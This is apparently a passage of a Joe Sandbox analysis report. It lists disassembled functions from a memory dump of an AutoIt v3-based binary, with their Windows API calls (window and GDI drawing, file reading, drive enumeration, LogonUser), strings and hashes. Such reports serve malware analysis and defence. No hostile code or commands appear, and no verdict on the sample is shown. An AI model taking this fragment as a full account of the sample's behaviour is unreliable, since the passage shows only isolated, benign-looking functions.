                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: LogonUser
                          • String ID:
                          • API String ID: 1244722697-0
                          • Opcode ID: 8c267964c90f7d3acf9c84297e1e6aa75523b8b3b89857738e50fe2d7bfb3d7d
                          • Instruction ID: ebf717a0f9f125cf153d56fffd26038e4f8e87a40696f500b1d77cb443f0d8ec
                          • Opcode Fuzzy Hash: 8c267964c90f7d3acf9c84297e1e6aa75523b8b3b89857738e50fe2d7bfb3d7d
                          • Instruction Fuzzy Hash: AFD09E321A464EAEDF025FA4EC06EAE3F6AEB04701F548511FA15D60A1C675D531EB50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B6F3AB Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON
                          Download Yara Rule
                          APIs
                          • NtdllDialogWndProc_W.NTDLL ref: 00B6F3D0
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: DialogNtdllProc_
                          • String ID:
                          • API String ID: 3239928679-0
                          • Opcode ID: 0f0f4e9da0bca11b3d885184ef7d31d2a4528ba5dc28d9107356ffa44477c0b1
                          • Instruction ID: a32c7554d59a01d8a2f25599666e432bd7c013b8bffb99dc6ff456729044ae54
                          • Opcode Fuzzy Hash: 0f0f4e9da0bca11b3d885184ef7d31d2a4528ba5dc28d9107356ffa44477c0b1
                          • Instruction Fuzzy Hash: F9E0E23420420CEFCB01DF88E844E863BA5FB1A350F000055FD048B262CB72A820EBA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B6F37C Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON
                          Download Yara Rule
                          APIs
                          • NtdllDialogWndProc_W.NTDLL ref: 00B6F3A1
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: DialogNtdllProc_
                          • String ID:
                          • API String ID: 3239928679-0
                          • Opcode ID: 5c0f267a79969eef35bc1fb10c7b7c80905037cb786654e57da0b984aa9eb2b0
                          • Instruction ID: c65b34b7932b0fe3f8a4a16cf5bb6b8c85278380d2be7f8dbf466e5a26f4917f
                          • Opcode Fuzzy Hash: 5c0f267a79969eef35bc1fb10c7b7c80905037cb786654e57da0b984aa9eb2b0
                          • Instruction Fuzzy Hash: 57E0E23420420CEFCB01DF88E844E863BA5FB2A350F000055FD048B262CB71A820DBA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B1B845 Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00B1AF7D: GetWindowLongW.USER32(?,000000EB), ref: 00B1AF8E
                            • Part of subcall function 00B1B86E: DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00B1B85B), ref: 00B1B926
                            • Part of subcall function 00B1B86E: KillTimer.USER32(00000000,?,00000000,?,?,?,?,00B1B85B,00000000,?,?,00B1AF1E,?,?), ref: 00B1B9BD
                          • NtdllDialogWndProc_W.NTDLL(?,00000002,00000000,00000000,00000000,?,?,00B1AF1E,?,?), ref: 00B1B864
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Window$DestroyDialogKillLongNtdllProc_Timer
                          • String ID:
                          • API String ID: 2797419724-0
                          • Opcode ID: 80b9e453f8b44ed294a9c21995dc55429cae81751f37f807013273d9eec0f984
                          • Instruction ID: 40a5d2141858ade6161458d1c39153c28356fdab5df63afbc819cadeb352406c
                          • Opcode Fuzzy Hash: 80b9e453f8b44ed294a9c21995dc55429cae81751f37f807013273d9eec0f984
                          • Instruction Fuzzy Hash: 33D0127214430C77DB102BA5DC07F8D3B5DAB11B50F908465F6056A1E28A71B451A555
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B28E19 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                          Download Yara Rule
                          APIs
                          • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00B28E1F
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: ExceptionFilterUnhandled
                          • String ID:
                          • API String ID: 3192549508-0
                          • Opcode ID: 3fe0a0506907af00c1b4655bd03faca86858759bd9f05f0d64666a47331b207a
                          • Instruction ID: 8d011527b091ece6fe9af7215086ee3b67c79bd104890797d76ddc634a8b879b
                          • Opcode Fuzzy Hash: 3fe0a0506907af00c1b4655bd03faca86858759bd9f05f0d64666a47331b207a
                          • Instruction Fuzzy Hash: 15A0123000050CE78A002B51EC044447F6CD7041507004021F40C010318B3354108685
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B20EC4 Relevance: .3, Instructions: 345COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                          • Instruction ID: 1ef0da9847abaaa30f2f7162b4ca19404dc9096280931a8c4a157f83919efcf2
                          • Opcode Fuzzy Hash: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                          • Instruction Fuzzy Hash: B8C1D5722191B349DF2D463D947443EBAE1DAB27B131A0BEDE4BBCB4C1EE24C564D620
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B212F9 Relevance: .3, Instructions: 341COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                          • Instruction ID: 498a27f2d4b475b0dd9a5d57a0a2a5b52201f31501c7fd007891933b39da4fee
                          • Opcode Fuzzy Hash: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                          • Instruction Fuzzy Hash: 9AC1D8722091B34ADF2D463DD47443EBAE19AB27B131A0BEDD4BBCB5C5EE24C524D620
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B20A8F Relevance: .3, Instructions: 331COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                          • Instruction ID: c60695eff49035aae44603c203f9b3b69a9e064eb37a9c44dcceebf471f21e89
                          • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                          • Instruction Fuzzy Hash: 2FC1E5722291B349DF2D5639A47443EFAE1DAA27B130A0BEDD4BBCB4C2EE14C564D710
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B20677 Relevance: .3, Instructions: 323COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                          • Instruction ID: 7e5414e9d63d2098ff5fa27e59e66b904c26718d3b70de0c636536d569698dae
                          • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                          • Instruction Fuzzy Hash: 67C1E5722191B349DF1D5639A47443EBBE19EA27B130A07EDD4BBCB4D2EE24D524C720
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B5A750 Relevance: 75.7, APIs: 39, Strings: 4, Instructions: 490filecommemoryCOMMON
                          Download Yara Rule
                          APIs
                          • DeleteObject.GDI32(00000000), ref: 00B5A7A5
                          • DeleteObject.GDI32(00000000), ref: 00B5A7B7
                          • DestroyWindow.USER32 ref: 00B5A7C5
                          • GetDesktopWindow.USER32 ref: 00B5A7DF
                          • GetWindowRect.USER32(00000000), ref: 00B5A7E6
                          • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 00B5A927
                          • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 00B5A937
                          • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B5A97F
                          • GetClientRect.USER32(00000000,?), ref: 00B5A98B
                          • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00B5A9C5
                          • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B5A9E7
                          • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B5A9FA
                          • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B5AA05
                          • GlobalFix.KERNEL32(00000000), ref: 00B5AA0E
                          • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B5AA1D
                          • GlobalUnWire.KERNEL32(00000000), ref: 00B5AA26
                          • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B5AA2D
                          • GlobalFree.KERNEL32(00000000), ref: 00B5AA38
                          • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00B8D9BC,00000000), ref: 00B5AA60
                          • GlobalFree.KERNEL32(00000000), ref: 00B5AA70
                          • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00B5AA96
                          • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00B5AAB5
                          • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B5AAD7
                          • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B5ACC4
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Window$Global$Rect$CreateFile$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadMessagePictureReadSendShowSizeWire
                          • String ID: $AutoIt v3$DISPLAY$static
                          • API String ID: 2547915802-2373415609
                          • Opcode ID: d9ce01e86e7a09f9213bcc2dbb97fc38a6bec4c4248955a8861ba1d22d83fa2c
                          • Instruction ID: 0761c02261c46a957063a6a0a332f405a1d91f01a19dba574b474f5e844375e9
                          • Opcode Fuzzy Hash: d9ce01e86e7a09f9213bcc2dbb97fc38a6bec4c4248955a8861ba1d22d83fa2c
                          • Instruction Fuzzy Hash: 09028E71900119EFDB14DF68CC89EAE7BB9FF49310F048699F905AB2A1DB309D41CB60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B6D095 Relevance: 49.8, APIs: 33, Instructions: 260COMMON
                          Download Yara Rule
                          APIs
                          • SetTextColor.GDI32(?,00000000), ref: 00B6D0EB
                          • GetSysColorBrush.USER32(0000000F), ref: 00B6D11C
                          • GetSysColor.USER32(0000000F), ref: 00B6D128
                          • SetBkColor.GDI32(?,000000FF), ref: 00B6D142
                          • SelectObject.GDI32(?,00000000), ref: 00B6D151
                          • InflateRect.USER32(?,000000FF,000000FF), ref: 00B6D17C
                          • GetSysColor.USER32(00000010), ref: 00B6D184
                          • CreateSolidBrush.GDI32(00000000), ref: 00B6D18B
                          • FrameRect.USER32(?,?,00000000), ref: 00B6D19A
                          • DeleteObject.GDI32(00000000), ref: 00B6D1A1
                          • InflateRect.USER32(?,000000FE,000000FE), ref: 00B6D1EC
                          • FillRect.USER32(?,?,00000000), ref: 00B6D21E
                          • GetWindowLongW.USER32(?,000000F0), ref: 00B6D249
                            • Part of subcall function 00B6D385: GetSysColor.USER32(00000012), ref: 00B6D3BE
                            • Part of subcall function 00B6D385: SetTextColor.GDI32(?,?), ref: 00B6D3C2
                            • Part of subcall function 00B6D385: GetSysColorBrush.USER32(0000000F), ref: 00B6D3D8
                            • Part of subcall function 00B6D385: GetSysColor.USER32(0000000F), ref: 00B6D3E3
                            • Part of subcall function 00B6D385: GetSysColor.USER32(00000011), ref: 00B6D400
                            • Part of subcall function 00B6D385: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00B6D40E
                            • Part of subcall function 00B6D385: SelectObject.GDI32(?,00000000), ref: 00B6D41F
                            • Part of subcall function 00B6D385: SetBkColor.GDI32(?,00000000), ref: 00B6D428
                            • Part of subcall function 00B6D385: SelectObject.GDI32(?,?), ref: 00B6D435
                            • Part of subcall function 00B6D385: InflateRect.USER32(?,000000FF,000000FF), ref: 00B6D454
                            • Part of subcall function 00B6D385: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00B6D46B
                            • Part of subcall function 00B6D385: GetWindowLongW.USER32(00000000,000000F0), ref: 00B6D480
                            • Part of subcall function 00B6D385: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00B6D4A8
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                          • String ID:
                          • API String ID: 3521893082-0
                          • Opcode ID: 709e5018d3c791e4e96d44ecd7b1eb3d7df2454302557650b80030fdd9f4b860
                          • Instruction ID: 2625f49e87346340bd3a882127e2530b585281ed9b0aa60aeb81a838ec0a501a
                          • Opcode Fuzzy Hash: 709e5018d3c791e4e96d44ecd7b1eb3d7df2454302557650b80030fdd9f4b860
                          • Instruction Fuzzy Hash: 6B916B72508301AFDB10AF64DC48E5BBBE9FF89325F100A1AF962A71E0DB75D944CB52
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B5A3F7 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON
                          Download Yara Rule
                          APIs
                          • DestroyWindow.USER32(00000000), ref: 00B5A42A
                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00B5A4E9
                          • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00B5A527
                          • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00B5A539
                          • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00B5A57F
                          • GetClientRect.USER32(00000000,?), ref: 00B5A58B
                          • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00B5A5CF
                          • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00B5A5DE
                          • GetStockObject.GDI32(00000011), ref: 00B5A5EE
                          • SelectObject.GDI32(00000000,00000000), ref: 00B5A5F2
                          • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00B5A602
                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00B5A60B
                          • DeleteDC.GDI32(00000000), ref: 00B5A614
                          • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00B5A642
                          • SendMessageW.USER32(00000030,00000000,00000001), ref: 00B5A659
                          • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00B5A694
                          • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00B5A6A8
                          • SendMessageW.USER32(00000404,00000001,00000000), ref: 00B5A6B9
                          • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00B5A6E9
                          • GetStockObject.GDI32(00000011), ref: 00B5A6F4
                          • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00B5A6FF
                          • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00B5A709
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                          • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                          • API String ID: 2910397461-517079104
                          • Opcode ID: c9a4a02a5ee51f7e30acdbcc1ed5a501eccadf887b82f90a562895c018356d73
                          • Instruction ID: fa8194c5392b06f0923c4c2ba7c901e45eb0dc51d727ab758b411173bb2d46b1
                          • Opcode Fuzzy Hash: c9a4a02a5ee51f7e30acdbcc1ed5a501eccadf887b82f90a562895c018356d73
                          • Instruction Fuzzy Hash: F6A13E71A40215BFEB14DBA9DC49FAE7BB9EB09710F004655FA14B72E1DBB0AD00CB64
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B4E44C Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 187COMMON
                          Download Yara Rule
                          APIs
                          • SetErrorMode.KERNEL32(00000001), ref: 00B4E45E
                          • GetDriveTypeW.KERNEL32(?,00B9DC88,?,\\.\,00B9DBF0), ref: 00B4E54B
                          • SetErrorMode.KERNEL32(00000000,00B9DC88,?,\\.\,00B9DBF0), ref: 00B4E6B1
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: ErrorMode$DriveType
                          • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                          • API String ID: 2907320926-4222207086
